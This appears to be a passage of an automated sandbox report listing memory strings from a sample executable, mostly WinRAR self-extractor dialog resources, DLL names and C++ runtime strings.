              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:captionmemstr_8f0151a9-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idokmemstr_a1c523ec-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idcancelmemstr_3d44459e-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idc_renamefrommemstr_e645ffea-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idc_renametomemstr_d7ac30e5-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:sizememstr_e6f52c9c-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:captionmemstr_a803d239-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idc_passwordentermemstr_73085e01-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idokmemstr_5aed23ac-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idcancelmemstr_6d77dff7-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:sizememstr_a1308d4c-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:captionmemstr_d72a10cd-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:idokmemstr_4c622ddd-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:idcancelmemstr_ab22a5e7-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:sizememstr_dcd908c8-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:captionmemstr_bb50e364-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolinfo1memstr_d740b0eb-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolfindmemstr_039eec25-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolinfo2memstr_6f72b705-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idokmemstr_c66d285a-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idcancelmemstr_a87076d4-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: user32.dllmemstr_afde2265-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: gdi32.dllmemstr_2a5b2dce-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: comdlg32.dllmemstr_49248f9d-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: advapi32.dllmemstr_d4b375e4-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shell32.dllmemstr_a0a1d8ff-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ppng riched20.dlls:ids_browsetitles:ids_cmdextractings:ids_skippings:ids_unexpeofs:ids_fileheaderbrokens:ids_headerbrokens:ids_mainheaderbrokens:ids_cmtheaderbrokens:ids_cmtbrokens:ids_outofmemoryerrors:ids_unknownmethods:ids_cannotopens:ids_cannotcreates:ids_cannotmkdirs:ids_encrcrcfaileds:ids_extrcrcfaileds:ids_packeddatacrcfaileds:ids_writeerrors:ids_readerrors:ids_closeerrors:ids_cannotfindvols:ids_badarchives:ids_extractings:ids_asknextvoltitles:ids_archeaderbrokens:ids_dones:ids_errors:ids_errorss:ids_bytess:ids_modifiedons:ids_badfolders:ids_createerrorss:ids_restarthints:ids_crcerrorss:ids_allfiless:ids_title1s:ids_title1as:ids_title2s:ids_title3s:ids_title4s:ids_title5s:ids_title6s:ids_arcbrokens:ids_extrfilestos:ids_extrfilestotemps:ids_extractbuttons:ids_extractprogresss:ids_maxpathlimits:ids_unkencmethods:ids_wrongpasswords:ids_wrongfilepasswords:ids_copyerrors:ids_cannotcreatelnkss:ids_cannotcreatelnkhs:ids_errlnktargets:ids_needadmins:ids_pauses:ids_continues:ids_secwarnings:ids_secdeldlls:ids_extrdictoutmems:ids_suggest64bits:ids_warnings:ids_dictexceedsrams:ids_dictsuggestcancels:ids_extractioncancelled$startdlg:size$startdlg:caption$startdlg:idc_destedittitle$startdlg:idc_changedir$startdlg:idc_progressbartitle$startdlg:idok$startdlg:idcancel$replacefiledlg:size$replacefiledlg:caption$replacefiledlg:idc_owrfileexists$replacefiledlg:idc_owraskreplace$replacefiledlg:idc_owrquestion$replacefiledlg:idc_owryes$replacefiledlg:idc_owrall$replacefiledlg:idc_owrrename$replacefiledlg:idc_owrno$replacefiledlg:idc_owrnoall$replacefiledlg:idc_owrcancel$renamedlg:size$renamedlg:caption$renamedlg:idok$renamedlg:idcancel$renamedlg:idc_renamefrom$renamedlg:idc_renameto$getpassword1:size$getpassword1:caption$getpassword1:idc_passwordenter$getpassword1:idok$getpassword1:idcancel$licensedlg:size$licensedlg:caption$licensedlg:idok$licensedlg:idcancel$asknextvol:size$asknextvol:caption$asknextvol:idc_nextvolinfo1$asknextvol:idc_nextvolfind$asknextvol:idc_nextvolinfo2$asknextvol:idok$asknextvol:idcancelrarsfx"staticunknown_folderreplacefiledlgrenamedlg%s %sgetpassword1%sxasknextvolwinrarsfxmappingfile.tmpsfxname%4d-%02d-%02d-%02d-%02d-%02d-%03dsfxstimestartdlgsfxcmdsfxparlicensedlg__tmp_rar_sfx_access_check_-el -s2 "-d%s" "-sp%s"runas"memstr_d28e9331-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deletetexttitlepathsilentoverwritesetuptempmodelicensepresetupshortcutsavepathupdatesetupcode.tmpprogramfilesdirsoftware\microsoft\windows\currentversionhidemaxmin@set:userlnk.lnk.infinstall.exesoftware\winrar sfxuser32.dllgdi32.dllcomdlg32.dlladvapi32.dllshell32.dllmemstr_79deae2c-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ole32.dllmemstr_30738de6-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: fole32.dllmemstr_bc0fcbcd-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: acquiresrwlockexclusivememstr_402531e8-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: releasesrwlockexclusivememstr_a2fc7fc1-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: kernel32.dllacquiresrwlockexclusivereleasesrwlockexclusivememstr_9eb12c1f-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shlwapi.dllmemstr_6e5633bb-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shlwapi.dll0vmemstr_9c232ac1-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <5ikqmemstr_6042c8e2-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: comctl32.dllmemstr_34bc940c-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sleepconditionvariablecsmemstr_d91c5f89-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wakeallconditionvariablememstr_489b41b7-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: api-ms-win-core-synch-l1-2-0.dllkernel32.dllsleepconditionvariablecswakeallconditionvariablememstr_04c9fa99-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad exceptionmemstr_66b58fcb-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __based(memstr_e75230ec-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __cdeclmemstr_82272e45-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __pascalmemstr_b0b7d8d0-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __stdcallmemstr_aa20544e-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __thiscallmemstr_d041c0f4-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __fastcallmemstr_2355ead4-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __vectorcallmemstr_a0a20994-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __clrcallmemstr_0664966f-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __eabimemstr_97cc6495-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_1memstr_8ef82cb1-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_2memstr_d0501e55-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_3memstr_d8d2869f-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __ptr64memstr_8499effa-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __restrictmemstr_216556be-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __unalignedmemstr_9b51e969-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: restrict(memstr_3b2c9649-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deletememstr_0ed03f72-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operatormemstr_4e4c6ead-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vftable'memstr_f09e6681-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vbtable'memstr_5615f950-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vcall'memstr_fc20c213-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `typeof'memstr_605546d4-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local static guard'memstr_2a4f7588-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `string'memstr_70d3ce34-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vbase destructor'memstr_4fd39082-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector deleting destructor'memstr_ecdd0c3a-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `default constructor closure'memstr_efffd62e-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `scalar deleting destructor'memstr_b35f382a-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector constructor iterator'memstr_b4506b01-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector destructor iterator'memstr_935e3486-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector vbase constructor iterator'memstr_a4a60e1d-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `virtual displacement map'memstr_b00e0888-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector constructor iterator'memstr_c8cd9138-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector destructor iterator'memstr_e151fb83-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector vbase constructor iterator'memstr_cadd193c-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `copy constructor closure'memstr_53cd7b58-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `udt returning'memstr_af0615d7-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `rttimemstr_b2c452ff-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local vftable'memstr_4873d059-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local vftable constructor closure'memstr_6f2e4732-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: new[]memstr_24400202-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: delete[]memstr_afbbbd25-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `omni callsig'memstr_ae43e240-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `placement delete closure'memstr_2c5e5a1b-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `placement delete[] closure'memstr_70714699-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `managed vector constructor iterator'memstr_e5581c35-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `managed vector destructor iterator'memstr_80d7e249-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector copy constructor iterator'memstr_3f49bcd7-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `eh vector vbase copy constructor iterator'memstr_06d34232-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `dynamic initializer for 'memstr_f8014e28-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `dynamic atexit destructor for 'memstr_289a5dfb-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector copy constructor iterator'memstr_8e756de8-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vector vbase copy constructor iterator'memstr_6a723b43-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `managed vector copy constructor iterator'memstr_609ccf50-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `local static thread guard'memstr_b02ca2ee-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator "" memstr_8657a4f2-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator co_awaitmemstr_642d5f30-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator<=>memstr_0f2a5332-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: type descriptor'memstr_788ef632-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: base class descriptor at (memstr_e0040098-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: base class array'memstr_91b046f0-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: class hierarchy descriptor'memstr_097013b2-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: complete object locator'memstr_3d217c86-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `anonymous namespace'memstr_09d984a7-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __based(__cdecl__pascal__stdcall__thiscall__fastcall__vectorcall__clrcall__eabi__swift_1__swift_2__swift_3__ptr64__restrict__unalignedrestrict( new delete=>><<!==!=[]operator->*++---+&->*/%<<=>>=,()~^|&&||*=+=-=/=%=>>=<<=&=|=^=`vftable'`vbtable'`vcall'`typeof'`local static guard'`string'`vbase destructor'`vector deleting destructor'`default constructor closure'`scalar deleting destructor'`vector constructor iterator'`vector destructor iterator'`vector vbase constructor iterator'`virtual displacement map'`eh vector constructor iterator'`eh vector destructor iterator'`eh vector vbase constructor iterator'`copy constructor closure'`udt returning'`eh`rtti`local vftable'`local vftable constructor closure' new[] delete[]`omni callsig'`placement delete closure'`placement delete[] closure'`managed vector constructor iterator'`managed vector destructor iterator'`eh vector copy constructor iterator'`eh vector vbase copy constructor iterator'`dynamic initializer for '`dynamic atexit destructor for '`vector copy constructor iterator'`vector vbase copy constructor iterator'`managed vector copy constructor iterator'`local static thread guard'operator "" operator co_awaitoperator<=> type descriptor' base class descriptor at ( base class array' class hierarchy descriptor' complete object locator'`anonymous namespace' memstr_4ebee6cc-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: api-ms-win-core-fibers-l1-1-1api-ms-win-core-synch-l1-2-0api-ms-memstr_a3c879dc-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flsallocmemstr_ca7d2504-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flsfreememstr_dc8a318b-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flsgetvaluememstr_7f1892a4-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: flssetvaluememstr_8c3c6f81-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: initializecriticalsectionexmemstr_8f3b6ca2-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ( 8pxmemstr_0d05f183-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 50p( 8pxmemstr_3a3765d6-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 700wpmemstr_b85e1fa6-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `h````memstr_a30e9606-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xpxxxxmemstr_dfc02893-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `h````xpxxxxmemstr_ddc3d994-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: (null)memstr_fb329e85-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: (null)(null)memstr_3662fdb3-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: corexitprocessmemstr_68912b15-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mscoree.dllcorexitprocess memstr_0c70d10d-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(snan)memstr_bba3003d-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(snan)memstr_9fc6b109-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(ind)memstr_acf3f799-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nan(ind)memstr_05ecd723-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: e+000memstr_8439876d-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sundaymemstr_30f45768-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mondaymemstr_1a1da328-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: tuesdaymemstr_3aaf0ce4-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wednesdaymemstr_4f1d713d-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: thursdaymemstr_c604fb02-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: fridaymemstr_08ef6198-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: saturdaymemstr_35d44bd9-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: januarymemstr_4fa397f2-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: februarymemstr_567d00f3-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: marchmemstr_5b10bee9-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: aprilmemstr_d549399b-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: augustmemstr_bf423848-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: septembermemstr_e3ccbd11-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: octobermemstr_40069991-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: novembermemstr_2ffcc913-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: decembermemstr_96f372b4-d
